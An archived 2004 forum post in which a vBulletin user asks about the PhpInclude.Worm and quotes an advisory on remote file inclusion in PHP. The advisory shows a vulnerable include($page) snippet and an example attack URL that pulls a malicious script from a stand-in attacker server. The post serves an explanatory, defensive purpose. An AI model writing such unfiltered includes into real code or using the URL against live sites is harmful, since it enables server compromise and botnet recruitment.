Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
Prev Previous Post   Next Post Next
  #1  
Old 12-29-2004, 11:56 PM
Mouse Mouse is offline
 
Join Date: Aug 2003
Posts: 1
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default PHP worm?

I was informed by my host there is a PHP worm out there...do you have an update or is Vbulltein alrwady secure for it? I run version 2.3.0
this is a copy of the email I got..any help would be appreicated.

There is a worm using Google to look for insecure PHP pages. The worm will exploit the PHP pages and take over your site ranging from web site defacement to deletion of files. The problem relates to insecure PHP coding using the followng items:

include()
require()
mail()
upload

---------

From the article:

The new worm PhpInclude.Worm is currently propagated on Internet, it attacks any nonprotected dynamic page. [ This worm is detected by certain antivirus as being an alternative of Santy. We estimate that this worm is completely different from the Santy family, we thus decided to allot alias generic "the PhpInclude.Worm to him" ].

Contrary to Santy, PhpInclude.Worm does not exploit the vulnerabilities phpBB, it exploits a broader pallet of faults known as "of programming". It seeks (via Google/Yahoo/AOL) Web servers whose php pages use the functions "include()" and" require()"in a not-protected way. How?

These functions are normally used by the programmers in order to include Web pages specified in arguments. Unfortunately, nonthe checking of these arguments can allow the inclusion and the execution of external files, and thus the compromising of the Web server:

Example: vulnerable.php
if(isset($page))
{
include($page);
}
-----------------------------------------------

The page above correctly does not filter the variable $$page, it thus allows inclusion then the execution of distant arbitrary scripts:

vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses

PhpInclude.Worm thus seeks pages of the type "* php?*=", then tries to insert various orders there allowing the installation of robots IRC and the constitution of an army of machines zombies.

--
Reply With Quote
 

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 08:36 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03842 seconds
  • Memory Usage 2,277KB
  • Queries Executed 12 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (3)post_thanks_box
  • (3)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (3)post_thanks_postbit_info
  • (3)postbit
  • (3)postbit_onlinestatus
  • (3)postbit_wrapper
  • (1)showthread_list
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_threadedmode.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids_threaded
  • showthread_threaded_construct_link
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete